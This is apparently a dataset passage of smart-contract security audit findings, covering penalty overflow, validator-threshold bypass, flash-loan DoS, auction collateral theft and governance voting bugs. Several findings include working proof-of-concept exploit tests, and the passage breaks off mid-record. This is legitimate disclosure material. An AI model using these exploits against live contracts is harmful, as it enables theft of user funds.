// instantaneous minter cash flow. To ensure instantaneous cashflow safety, we we use the derivatives of the\\n // previous starting inequality, and substitute `dt = 0`.\\n // Effectively: p1 * rate1 >= p2 * rate2\\n // So: rate2 <= p1 * rate1 / p2\\n // 1. totalActive * minterRate >= totalEarning * earnerRate\\n // 2. totalActive * minterRate / totalEarning >= earnerRate\\n // solhint-enable max-line-length\\n\\n if (totalActiveOwedM_ == 0) return 0;\\n\\n if (totalEarningSupply_ == 0) return type(uint32).max;\\n\\n if (totalActiveOwedM_ <= totalEarningSupply_) {//@audit-info rate is slashed\\n // NOTE: `totalActiveOwedM_ * minterRate_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n return uint32((uint256(totalActiveOwedM_) * minterRate_) / totalEarningSupply_);\\n }\\n\\n uint48 deltaMinterIndex_ = ContinuousIndexingMath.getContinuousIndex(\\n ContinuousIndexingMath.convertFromBasisPoints(minterRate_),\\n RATE_CONFIDENCE_INTERVAL\\n );//@audit-info deltaMinterIndex for 30 days\\n\\n // NOTE: `totalActiveOwedM_ * deltaMinterIndex_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n int256 lnArg_ = int256(\\n _EXP_SCALED_ONE +\\n ((uint256(totalActiveOwedM_) * (deltaMinterIndex_ - _EXP_SCALED_ONE)) / totalEarningSupply_)\\n );\\n\\n int256 lnResult_ = wadLn(lnArg_ * _WAD_TO_EXP_SCALER) / _WAD_TO_EXP_SCALER;\\n\\n uint256 expRate_ = (uint256(lnResult_) * ContinuousIndexingMath.SECONDS_PER_YEAR) / RATE_CONFIDENCE_INTERVAL;\\n\\n if (expRate_ > type(uint64).max) return type(uint32).max;\\n\\n // NOTE: Do not need to do `UIntMath.safe256` because it is known that `lnResult_` will not be negative.\\n uint40 safeRate_ = ContinuousIndexingMath.convertToBasisPoints(uint64(expRate_));\\n\\n return (safeRate_ > type(uint32).max) ? type(uint32).max : uint32(safeRate_);\\n }\\n```\\n -Malicious minters can repeatedly penalize their undercollateralized accounts in a short peroid of time, which can result in disfunctioning of critical protocol functions, such as `mintM`.чmediumчMalicious minters can exploit the `updateCollateral()` function to repeatedly penalize their undercollateralized accounts in a short peroid of time. This can make the `principalOfTotalActiveOwedM` to reach `uint112.max` limit, disfunctioning some critical functions, such as `mintM`.\\nThe `updateCollateral()` function allows minters to update their collateral status to the protocol, with penalties imposed in two scenarios:\\nA penalty is imposed for each missing collateral update interval.\\nA penalty is imposed if a minter is undercollateralized.\\nThe critical issue arises with the penalty for being undercollateralized, which is imposed on each call to `updateCollateral()`. This penalty is compounded, calculated as `penaltyRate * (principalOfActiveOwedM_ - principalOfMaxAllowedActiveOwedM_)`, and the `principalOfActiveOwedM_` increases with each imposed penalty.\\nProof Of Concept\\nWe can do a simple calculation, using the numbers from unit tests, mintRatio=90%, penaltyRate=1%, updateCollateralInterval=2000 (seconds). A malicious minter deposits `$100,000` t-bills as collateral, and mints `$90,000` M tokens. Since M tokens have 6 decimals, the collateral would be `100000e6`. Following the steps below, the malicious minter would be able to increase `principalOfActiveOwedM_` close to uint112.max limit:\\nDeposit collateral and mint M tokens.\\nWait for 4 collateral update intervals. This is for accumulating some initial penalty to get undercollateralized.\\nCall `updateCollateral()`. The penalty for missing updates would be `4 * 90000e6 * 1% = 36e8`.\\nStarting from `36e8`, we can keep calling `updateCollateral()` to compound penalty for undercollateralization. Each time would increase the penalty by 1%. We only need `log(2^112 / `36e8`, 1.01) ~ 5590` times to hit `uint112.max` limit.\\nAdd the following testing code to `MinterGateway.t.sol`. We can see in logs that `principalOfTotalActiveOwedM` has hit uint112.max limit.\\n```\\n penalty: 1 94536959275 94536000000\\n penalty: 2 95482328867 95481360000\\n penalty: 3 96437152156 96436173600\\n penalty: 4 97401523678 97400535336\\n penalty: 5 98375538914 98374540689\\n penalty: 6 99359294302 99358286095\\n penalty: 7 100352887244 100351868955\\n penalty: 8 101356416116 101355387644\\n penalty: 9 102369980277 102368941520\\n penalty: 10 103393680080 103392630935\\n // rest of code\\n penalty: 5990 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5991 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5992 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5993 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5994 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5995 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5996 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5997 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5998 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5999 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 6000 5192349545726433803396851311815959 5192296858534827628530496329220095\\n```\\n\\n```\\n // Using default test settings: mintRatio = 90%, penaltyRate = 1%, updateCollateralInterval = 2000.\\n function test_penaltyForUndercollateralization() external {\\n // 1. Minter1 deposits $100,000 t-bills, and mints 90,000 $M Tokens.\\n uint initialTimestamp = block.timestamp;\\n _minterGateway.setCollateralOf(_minter1, 100000e6);\\n _minterGateway.setUpdateTimestampOf(_minter1, initialTimestamp);\\n _minterGateway.setRawOwedMOf(_minter1, 90000e6);\\n _minterGateway.setPrincipalOfTotalActiveOwedM(90000e6);\\n\\n // 2. Minter does not update for 4 updateCollateralIntervals, causing penalty for missing updates.\\n vm.warp(initialTimestamp + 4 * _updateCollateralInterval);\\n\\n // 3. Minter fetches a lot of signatures from validator, each with different timestamp and calls `updateCollateral()` many times.\\n // Since the penalty for uncollateralization is counted every time, and would hit `uint112.max` at last.\\n uint256[] memory retrievalIds = new uint256[](0);\\n address[] memory validators = new address[](1);\\n validators[0] = _validator1;\\n\\n for (uint i = 1; i <= 6000; ++i) {\\n\\n uint256[] memory timestamps = new uint256[](1);\\n uint256 signatureTimestamp = initialTimestamp + i;\\n timestamps[0] = signatureTimestamp;\\n bytes[] memory signatures = new bytes[](1);\\n signatures[0] = _getCollateralUpdateSignature(\\n address(_minterGateway),\\n _minter1,\\n 100000e6,\\n retrievalIds,\\n bytes32(0),\\n signatureTimestamp,\\n _validator1Pk\\n );\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100000e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n console.log(\"penalty:\", i, _minterGateway.totalActiveOwedM(), _minterGateway.principalOfTotalActiveOwedM());\\n }\\n }\\n```\\n\\nNote that in real use case, the penalty rate may lower (e.g. 0.1%), however, `log(2^112 / 36e8, 1.001) ~ 55656` is still a reasonable amount since there are 1440 minutes in 1 day (not to mention if the frequency for signature may be higher than once per minute). A malicious minter can still gather enough signatures for the attack.чConsider only imposing penalty for undercollateralization for each update interval.чThe direct impact is that `principalOfTotalActiveOwedM` will hit `uint112.max` limit. All related protocol features would be disfunctioned, the most important one being `mintM`, since the function would revert if `principalOfTotalActiveOwedM` hits `uint112.max` limit.\\n```\\n unchecked {\\n uint256 newPrincipalOfTotalActiveOwedM_ = uint256(principalOfTotalActiveOwedM_) + principalAmount_;\\n\\n // As an edge case precaution, prevent a mint that, if all owed M (active and inactive) was converted to\\n // a principal active amount, would overflow the `uint112 principalOfTotalActiveOwedM`.\\n> if (\\n> // NOTE: Round the principal up for worst case.\\n> newPrincipalOfTotalActiveOwedM_ + _getPrincipalAmountRoundedUp(totalInactiveOwedM) >= type(uint112).max\\n> ) {\\n> revert OverflowsPrincipalOfTotalOwedM();\\n> }\\n\\n principalOfTotalActiveOwedM = uint112(newPrincipalOfTotalActiveOwedM_);\\n _rawOwedM[msg.sender] += principalAmount_; // Treat rawOwedM as principal since minter is active.\\n }\\n```\\nч```\\n penalty: 1 94536959275 94536000000\\n penalty: 2 95482328867 95481360000\\n penalty: 3 96437152156 96436173600\\n penalty: 4 97401523678 97400535336\\n penalty: 5 98375538914 98374540689\\n penalty: 6 99359294302 99358286095\\n penalty: 7 100352887244 100351868955\\n penalty: 8 101356416116 101355387644\\n penalty: 9 102369980277 102368941520\\n penalty: 10 103393680080 103392630935\\n // rest of code\\n penalty: 5990 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5991 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5992 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5993 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5994 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5995 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5996 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5997 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5998 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5999 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 6000 5192349545726433803396851311815959 5192296858534827628530496329220095\\n```\\n -Validator threshold can be bypassed: a single compromised validator can update minter's state to historical stateчmediumчThe `updateCollateralValidatorThreshold` specifies the minimum number of validators needed to confirm the validity of `updateCollateral` data. However, just one compromised validator is enough to alter a minter's collateral status. In particular, this vulnerability allows the compromised validator to set the minter's state back to a historical state, allowing malicious minters to increase their collateral.\\nThe `updateCollateral()` function calls the `_verifyValidatorSignatures()` function, which calculates the minimum timestamp signed by all validators. This timestamp is then used to update the minter state's `_minterStates[minter_].updateTimestamp`. The constraint during this process is that the `_minterStates[minter_].updateTimestamp` must always be increasing.\\nFunction updateCollateral():\\n```\\n minTimestamp_ = _verifyValidatorSignatures(\\n msg.sender,\\n collateral_,\\n retrievalIds_,\\n metadataHash_,\\n validators_,\\n timestamps_,\\n signatures_\\n );\\n // rest of code\\n _updateCollateral(msg.sender, safeCollateral_, minTimestamp_);\\n // rest of code\\n```\\n\\nFunction _updateCollateral():\\n```\\n function _updateCollateral(address minter_, uint240 amount_, uint40 newTimestamp_) internal {\\n uint40 lastUpdateTimestamp_ = _minterStates[minter_].updateTimestamp;\\n\\n // MinterGateway already has more recent collateral update\\n if (newTimestamp_ <= lastUpdateTimestamp_) revert StaleCollateralUpdate(newTimestamp_, lastUpdateTimestamp_);\\n\\n _minterStates[minter_].collateral = amount_;\\n _minterStates[minter_].updateTimestamp = newTimestamp_;\\n }\\n```\\n\\nIf we have 1 compromised validator, its signature can be manipulated to any chosen timestamp. Consequently, this allows for control over the timestamp in `_minterStates[minter_].updateTimestamp` making it possible to update the minter's state to a historical state. An example is given in the following proof of concept. The key here is that even though `updateCollateralValidatorThreshold` may be set to 2 or even 3, as long as 1 validator is compromised, the attack vector would work, thus defeating the purpose of having a validator threshold.\\nProof Of Concept\\nIn this unit test, `updateCollateralInterval` is set to 2000 (default value). The `updateCollateralValidatorThreshold` is set to 2, and the `_validator1` is compromised. Following the steps below, we show how we update minter to a historical state:\\nInitial timestamp is `T0`.\\n100 seconds passed, the current timestamp is `T0+100`. Deposit 100e6 collateral at `T0+100`. `_validator0` signs signature at `T0+100`, and `_validator1` signs signature at `T0+1`. After `updateCollateral()`, minter state collateral = 100e6, and updateTimestamp = `T0+1`.\\nAnother 100 seconds passed, the current timestamp is `T0+200`. Propose retrieval for all collateral, and perform the retrieval offchain. `_validator0` signs signature at `T0+200`, and `_validator1` signs signature at `T0+2`. After `updateCollateral()`, minter state collateral = 0, and updateTimestamp = `T0+2`.\\nAnother 100 seconds passed, the current timestamp is `T0+300`. Reuse `_validator0` signature from step 1, it is signed on timestamp `T0+100`. `_validator1` signs collateral=100e6 at `T0+3`. After `updateCollateral()`, minter state collateral = 100e6, and updateTimestamp = `T0+3`.\\nNow, the minter is free to perform minting actions since his state claims collateral is 100e6, even though he has already retrieved it back in step 2. The mint proposal may even be proposed between step 1 and step 2 to reduce the mintDelay the minter has to wait.\\nAdd the following testing code to `MinterGateway.t.sol`. See more description in code comments.\\n```\\n function test_collateralStatusTimeTravelBySingleHackedValidator() external {\\n _ttgRegistrar.updateConfig(TTGRegistrarReader.UPDATE_COLLATERAL_VALIDATOR_THRESHOLD, bytes32(uint256(2)));\\n\\n // Arrange validator addresses in increasing order.\\n address[] memory validators = new address[](2);\\n validators[0] = _validator2;\\n validators[1] = _validator1;\\n\\n uint initialTimestamp = block.timestamp;\\n bytes[] memory cacheSignatures = new bytes[](2);\\n // 1. Deposit 100e6 collateral, and set malicious validator timestamp to `initialTimestamp+1` during `updateCollateral()`.\\n {\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory retrievalIds = new uint256[](0);\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp;\\n timestamps[1] = initialTimestamp + 1;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), block.timestamp, _validator2Pk);\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), initialTimestamp + 1, _validator1Pk);\\n cacheSignatures = signatures;\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 100e6);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 1);\\n }\\n\\n // 2. Retrieve all collateral, and set malicious validator timestamp to `initialTimestamp+2` during `updateCollateral()`.\\n {\\n vm.prank(_minter1);\\n uint256 retrievalId = _minterGateway.proposeRetrieval(100e6);\\n\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory newRetrievalIds = new uint256[](1);\\n newRetrievalIds[0] = retrievalId;\\n\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp;\\n timestamps[1] = initialTimestamp + 2;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 0, newRetrievalIds, bytes32(0), block.timestamp, _validator2Pk);\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 0, newRetrievalIds, bytes32(0), initialTimestamp + 2, _validator1Pk);\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(0, newRetrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 0);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 2);\\n }\\n\\n // 3. Reuse signature from step 1, and set malicious validator timestamp to `initialTimestamp+3` during `updateCollateral()`.\\n // We have successfully \"travelled back in time\", and minter1's collateral is back to 100e6.\\n {\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory retrievalIds = new uint256[](0);\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp - 200;\\n timestamps[1] = initialTimestamp + 3;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = cacheSignatures[0];\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), initialTimestamp + 3, _validator1Pk);\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 100e6);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 3);\\n }\\n }\\n```\\nчUse the maximum timestamp of all validators instead of minimum, or take the threshold-last minimum instead of the most minimum.чAs shown in the proof of concept, the minter can use the extra collateral to mint M tokens for free.\\nOne may claim that during minting, the `collateralOf()` function checks for `block.timestamp < collateralExpiryTimestampOf(minter_)`, however, since during deployment `updateCollateralInterval` is set to 86400, that gives us enough time to perform the attack vector before \"fake\" collateral expires.ч```\\n minTimestamp_ = _verifyValidatorSignatures(\\n msg.sender,\\n collateral_,\\n retrievalIds_,\\n metadataHash_,\\n validators_,\\n timestamps_,\\n signatures_\\n );\\n // rest of code\\n _updateCollateral(msg.sender, safeCollateral_, minTimestamp_);\\n // rest of code\\n```\\n -Liquidation bonus scales exponentially instead of linearly.чmediumчLiquidation bonus scales exponentially instead of linearly.\\nLet's look at the code of `getLiquidationBonus`\\n```\\n function getLiquidationBonus(\\n address token,\\n uint256 borrowedAmount,\\n uint256 times\\n ) public view returns (uint256 liquidationBonus) {\\n // Retrieve liquidation bonus for the given token\\n Liquidation memory liq = liquidationBonusForToken[token];\\n unchecked {\\n if (liq.bonusBP == 0) {\\n // If there is no specific bonus for the token\\n // Use default bonus\\n liq.minBonusAmount = Constants.MINIMUM_AMOUNT;\\n liq.bonusBP = dafaultLiquidationBonusBP;\\n }\\n liquidationBonus = (borrowedAmount * liq.bonusBP) / Constants.BP;\\n\\n if (liquidationBonus < liq.minBonusAmount) {\\n liquidationBonus = liq.minBonusAmount;\\n }\\n liquidationBonus *= (times > 0 ? times : 1);\\n }\\n }\\n```\\n\\nAs we can see, the liquidation bonus is based on the entire `borrowAmount` and multiplied by the number of new loans added. The problem is that it is unfair when the user makes a borrow against multiple lenders.\\nIf a user takes a borrow for X against 1 lender, they'll have to pay a liquidation bonus of Y. However, if they take a borrow for 3X against 3 lenders, they'll have to pay 9Y, meaning that taking a borrow against N lenders leads to overpaying liquidation bonus by N times.\\nFurthermore, if the user simply does it in multiple transactions, they can avoid these extra fees (as they can simply call `borrow` for X 3 times and pay 3Y in Liquidation bonuses)чmake liquidation bonus simply a % of totalBorrowedчLoss of fundsч```\\n function getLiquidationBonus(\\n address token,\\n uint256 borrowedAmount,\\n uint256 times\\n ) public view returns (uint256 liquidationBonus) {\\n // Retrieve liquidation bonus for the given token\\n Liquidation memory liq = liquidationBonusForToken[token];\\n unchecked {\\n if (liq.bonusBP == 0) {\\n // If there is no specific bonus for the token\\n // Use default bonus\\n liq.minBonusAmount = Constants.MINIMUM_AMOUNT;\\n liq.bonusBP = dafaultLiquidationBonusBP;\\n }\\n liquidationBonus = (borrowedAmount * liq.bonusBP) / Constants.BP;\\n\\n if (liquidationBonus < liq.minBonusAmount) {\\n liquidationBonus = liq.minBonusAmount;\\n }\\n liquidationBonus *= (times > 0 ? times : 1);\\n }\\n }\\n```\\n -When the amout of token acquired by a flash loan exceeds the expected value, the callback function will fail.чmediumчWhen the amout of token acquired by a flash loan exceeds the expected value, the callback function will fail.\\nThe function `wagmiLeverageFlashCallback` is used to handle the repayment operation after flash loan. After obtaining enough saleToken, it uses `_v3SwapExact` to convert the saleToken into holdToken. We know that the amount of holdTokens (holdTokenAmtIn) is proportional to the amount of saleTokens (amountToPay) obtained from flash loans. Later, the function will check the `holdTokenAmtIn` is no large than decodedData.holdTokenDebt.\\n```\\n// Swap tokens to repay the flash loan\\nuint256 holdTokenAmtIn = _v3SwapExact(\\n v3SwapExactParams({\\n isExactInput: false,\\n fee: decodedData.fee,\\n tokenIn: decodedData.holdToken,\\n tokenOut: decodedData.saleToken,\\n amount: amountToPay\\n })\\n);\\ndecodedData.holdTokenDebt -= decodedData.zeroForSaleToken\\n ? decodedData.amounts.amount1\\n : decodedData.amounts.amount0;\\n\\n// Check for strict route adherence, revert the transaction if conditions are not met\\n(decodedData.routes.strict && holdTokenAmtIn > decodedData.holdTokenDebt).revertError(\\n ErrLib.ErrorCode.SWAP_AFTER_FLASH_LOAN_FAILED\\n);\\n```\\n\\nIn the function `_excuteCallback`, the amount of token finally obtained by the user through flash loan is `flashBalance`, which is the balance of the contract.\\n```\\n// Transfer the flashBalance to the recipient\\ndecodedData.saleToken.safeTransfer(decodedDataExt.recipient, flashBalance);\\n// Invoke the WagmiLeverage callback function with updated parameters\\nIWagmiLeverageFlashCallback(decodedDataExt.recipient).wagmiLeverageFlashCallback(\\n flashBalance,\\n interest,\\n decodedDataExt.originData\\n);\\n```\\n\\nNow let me describe how the attacker compromises the flash loans.\\nFirst, the attacker makes a donation to the `FlashLoanAggregator` contract before the victim performs a flash loan (using front-run). Then victim performs a flash loan, and he/she will get much more flashBalance than expected. Finally, in the function `wagmiLeverageFlashCallback`, the holdTokenAmtIn is larger than experted, which leads to fail.чIn the function `_excuteCallback`, the amount of token finally obtained by the user through flash loan should be the the balance difference during the flash loan period.чDOSч```\\n// Swap tokens to repay the flash loan\\nuint256 holdTokenAmtIn = _v3SwapExact(\\n v3SwapExactParams({\\n isExactInput: false,\\n fee: decodedData.fee,\\n tokenIn: decodedData.holdToken,\\n tokenOut: decodedData.saleToken,\\n amount: amountToPay\\n })\\n);\\ndecodedData.holdTokenDebt -= decodedData.zeroForSaleToken\\n ? decodedData.amounts.amount1\\n : decodedData.amounts.amount0;\\n\\n// Check for strict route adherence, revert the transaction if conditions are not met\\n(decodedData.routes.strict && holdTokenAmtIn > decodedData.holdTokenDebt).revertError(\\n ErrLib.ErrorCode.SWAP_AFTER_FLASH_LOAN_FAILED\\n);\\n```\\n -Highest bidder can withdraw his collateral due to a missing check in _cancelAllBidsчhighчA bidder with the highest bid cannot cancel his bid since this would break the auction. A check to ensure this was implemented in `_cancelBid`.\\nHowever, this check was not implemented in `_cancelAllBids`, allowing the highest bidder to withdraw his collateral and win the auction for free.\\nThe highest bidder should not be able to cancel his bid, since this would break the entire auction mechanism.\\nIn `_cancelBid` we can find a require check that ensures this:\\n```\\n require(\\n bidder != l.highestBids[tokenId][round].bidder,\\n 'EnglishPeriodicAuction: Cannot cancel bid if highest bidder'\\n );\\n```\\n\\nYet in `_cancelAllBids`, this check was not implemented.\\n```\\n * @notice Cancel bids for all rounds\\n */\\n function _cancelAllBids(uint256 tokenId, address bidder) internal {\\n EnglishPeriodicAuctionStorage.Layout\\n storage l = EnglishPeriodicAuctionStorage.layout();\\n\\n uint256 currentAuctionRound = l.currentAuctionRound[tokenId];\\n\\n for (uint256 i = 0; i <= currentAuctionRound; i++) {\\n Bid storage bid = l.bids[tokenId][i][bidder];\\n\\n if (bid.collateralAmount > 0) {\\n // Make collateral available to withdraw\\n l.availableCollateral[bidder] += bid.collateralAmount;\\n\\n // Reset collateral and bid\\n bid.collateralAmount = 0;\\n bid.bidAmount = 0;\\n }\\n }\\n }\\n```\\n\\nExample: User Bob bids 10 eth and takes the highest bidder spot. Bob calls `cancelAllBidsAndWithdrawCollateral`.\\nThe `_cancelAllBids` function is called and this makes all the collateral from all his bids from every round available to Bob. This includes the current round `<=` and does not check if Bob is the current highest bidder. Nor is `l.highestBids[tokenId][round].bidder` reset, so the system still has Bob as the highest bidder.\\nThen `_withdrawCollateral` is automatically called and Bob receives his 10 eth back.\\nThe auction ends. If Bob is still the highest bidder, he wins the auction and his bidAmount of 10 eth is added to the availableCollateral of the oldBidder.\\nIf there currently is more than 10 eth in the contract (ongoing auctions, bids that have not withdrawn), then the oldBidder can withdraw 10 eth. But this means that in the future a withdraw will fail due to this missing 10 eth.чImplement the require check from _cancelBid to _cancelAllBids.чA malicious user can win an auction for free.\\nAdditionally, either the oldBidder or some other user in the future will suffer the loss.\\nIf this is repeated multiple times, it will drain the contract balance and all users will lose their locked collateral.ч```\\n require(\\n bidder != l.highestBids[tokenId][round].bidder,\\n 'EnglishPeriodicAuction: Cannot cancel bid if highest bidder'\\n );\\n```\\n -User Can Vote Even When They Have 0 Locked Mento (Edge Case)чmediumчThere exists an edge case where the user will be withdrawing his entire locked MENTO amount and even then will be able to vote , this is depicted by a PoC to make things clearer.\\nThe flow to receiving voting power can be understood in simple terms as follows ->\\nUsers locks his MENTO and chooses a delegate-> received veMENTO which gives them(delegatee) voting power (there's cliff and slope at play too)\\nThe veMENTO is not a standard ERC20 , it is depicted through \"lines\" , voting power declines ( ie. slope period) with time and with time you can withdraw more of your MENTO.\\nThe edge case where the user will be withdrawing his entire locked MENTO amount and even then will be able to vote is as follows ->\\n1.) User has locked his MENTO balance in the Locking.sol\\n2.) The owner of the contract \"stops\" the contract for some emergency reason.\\n4.) Since the contract is stopped , the `getAvailableForWithdraw` will return the entire locked amount of the user as withdrawable\\n```\\nfunction getAvailableForWithdraw(address account) public view returns (uint96) {\\n uint96 value = accounts[account].amount;\\n if (!stopped) {\\n uint32 currentBlock = getBlockNumber();\\n uint32 time = roundTimestamp(currentBlock);\\n uint96 bias = accounts[account].locked.actualValue(time, currentBlock);\\n value = value - (bias);\\n }\\n return value;\\n```\\n\\n5.) The user receives his entire locked amount in L101.\\n6.) The owner \"start()\" the contract again\\n7.) Since the user's veMENTO power was not effected by the above flow , there still exists veMENTO a.k.a voting power to the delegate, and the user's delegate is still able to vote on proposals (even when the user has withdrew everything).\\nPOC\\nImport console log first in the file , paste this test in the `GovernanceIntegration.t.sol`\\n```\\nfunction test_Poc_Stop() public {\\n\\n vm.prank(governanceTimelockAddress);\\n mentoToken.transfer(alice, 10_000e18);\\n\\n vm.prank(governanceTimelockAddress);\\n mentoToken.transfer(bob, 10_000e18);\\n\\n vm.prank(alice);\\n locking.lock(alice, alice, 10_000e18, 1, 103);\\n\\n vm.prank(bob);\\n locking.lock(bob, bob, 1500e18, 1, 103);\\n\\n vm.timeTravel(BLOCKS_DAY);\\n\\n uint256 newVotingDelay = BLOCKS_DAY;\\n uint256 newVotingPeriod = 2 * BLOCKS_WEEK;\\n uint256 newThreshold = 5000e18;\\n uint256 newQuorum = 10; //10%\\n uint256 newMinDelay = 3 days;\\n uint32 newMinCliff = 6;\\n uint32 newMinSlope = 12;\\n\\n vm.prank(alice);\\n (\\n uint256 proposalId,\\n address[] memory targets,\\n uint256[] memory values,\\n bytes[] memory calldatas,\\n string memory description\\n ) = Proposals._proposeChangeSettings(\\n mentoGovernor,\\n governanceTimelock,\\n locking,\\n newVotingDelay,\\n newVotingPeriod,\\n newThreshold,\\n newQuorum,\\n newMinDelay,\\n newMinCliff,\\n newMinSlope\\n );\\n\\n // ~10 mins\\n vm.timeTravel(120);\\n\\n \\n\\n vm.startPrank(governanceTimelockAddress);\\n locking.stop();\\n vm.stopPrank();\\n\\n uint bal2 = mentoToken.balanceOf(alice);\\n console.log(bal2);\\n\\n vm.startPrank(alice);\\n locking.withdraw();\\n vm.stopPrank();\\n\\n vm.startPrank(governanceTimelockAddress);\\n locking.start();\\n vm.stopPrank();\\n\\n uint bal = mentoToken.balanceOf(alice);\\n console.log(bal);\\n vm.prank(alice);\\n \\n\\n console.log(mentoGovernor.castVote(proposalId, 1));\\n }\\n```\\n\\nYou can see the Alice withdrew her entire locked amount and still was able to caste her vote.чWhen the entire amount is withdrawn adjust the logic to remove the corresponding lines for the delegator.чUser still able to vote even when the entire locked amount is withdrawn.ч```\\nfunction getAvailableForWithdraw(address account) public view returns (uint96) {\\n uint96 value = accounts[account].amount;\\n if (!stopped) {\\n uint32 currentBlock = getBlockNumber();\\n uint32 time = roundTimestamp(currentBlock);\\n uint96 bias = accounts[account].locked.actualValue(time, currentBlock);\\n value = value - (bias);\\n }\\n return value;\\n```\\n -Auction fails if the 'Honorarium Rate' is 0%чmediumчThe Honorarium Rate is the required percentage of a winning Auction Pitch bid that the Steward makes to the Creator Circle at the beginning of each Stewardship Cycle.\\n`$$ Winning Bid * Honorarium Rate = Periodic Honorarium $$`\\nTo mimic the dynamics of private ownership, the Creator Circle may choose a 0% Honorarium Rate. However, doing so breaks the functionality of the protocol.\\nTo place a bid, a user must call the `placeBid` function in `EnglishPeriodicAuctionFacet.sol` and deposit collateral(collateralAmount) equal to `bidAmount + feeAmount`. The `feeAmount` here represents the Honorarium Rate mentioned above. The `placeBid` function calls the `_placeBid` internal function in `EnglishPeriodicAuctionInternal.sol` which calculates the `totalCollateralAmount` as follows :\\n```\\nuint256 totalCollateralAmount = bid.collateralAmount + collateralAmount;\\n```\\n\\nHere, `bid.collateralAmount` is the cumulative collateral deposited by the bidder in previous bids during the current auction round(i.e, zero if no bids were placed), and `collateralAmount` is the collateral to be deposited to place the bid. However the `_placeBid` function requires that `totalCollateralAmount` is strictly greater than `bidAmount` if the bidder is not the current owner of the Stewardship License. This check fails when the `feeAmount` is zero and this causes a Denial of Service to users trying to place a bid. Even if the users try to bypass this by depositing a value slightly larger than `bidAmount`, the `_checkBidAmount` function would still revert with `'Incorrect bid amount'`\\nPOC\\nThe following test demonstrates the above-mentioned scenario :\\n```\\n describe('exploit', function () {\\n it('POC', async function () {\\n // Auction start: Now + 100\\n // Auction end: Now + 400\\n const instance = await getInstance({\\n auctionLengthSeconds: 300,\\n initialPeriodStartTime: (await time.latest()) + 100,\\n licensePeriod: 1000,\\n });\\n const licenseMock = await ethers.getContractAt(\\n 'NativeStewardLicenseMock',\\n instance.address,\\n );\\n\\n // Mint token manually\\n const steward = bidder2.address;\\n await licenseMock.mintToken(steward, 0);\\n\\n // Start auction\\n await time.increase(300);\\n \\n const bidAmount = ethers.utils.parseEther('1.0');\\n const feeAmount = await instance.calculateFeeFromBid(bidAmount);\\n const collateralAmount = feeAmount.add(bidAmount);\\n\\n // Reverts when a user tries to place a bid\\n await expect( instance\\n .connect(bidder1)\\n .placeBid(0, bidAmount, { value: collateralAmount })).to.be.revertedWith('EnglishPeriodicAuction: Collateral must be greater than current bid');\\n\\n \\n \\n const extraAmt = ethers.utils.parseEther('0.1');\\n const collateralAmount1 = feeAmount.add(bidAmount).add(extraAmt);\\n \\n // Also reverts when the user tries to deposit collateral slighty greater than bid amount\\n await expect( instance\\n .connect(bidder1)\\n .placeBid(0, bidAmount, { value: collateralAmount1 })).to.be.revertedWith('EnglishPeriodicAuction: Incorrect bid amount'); \\n \\n // Only accepts a bid from the current steward\\n \\n await expect( instance\\n .connect(bidder2)\\n .placeBid(0, bidAmount, { value: 0 })).to.not.be.reverted;\\n\\n });\\n });\\n```\\n\\nTo run the test, copy the code above to `EnglishPeriodicAuction.ts` and alter L#68 as follows :\\n```\\n// Remove the line below\\n [await owner.getAddress(), licensePeriod, 1, 10],\\n// Add the line below\\n [await 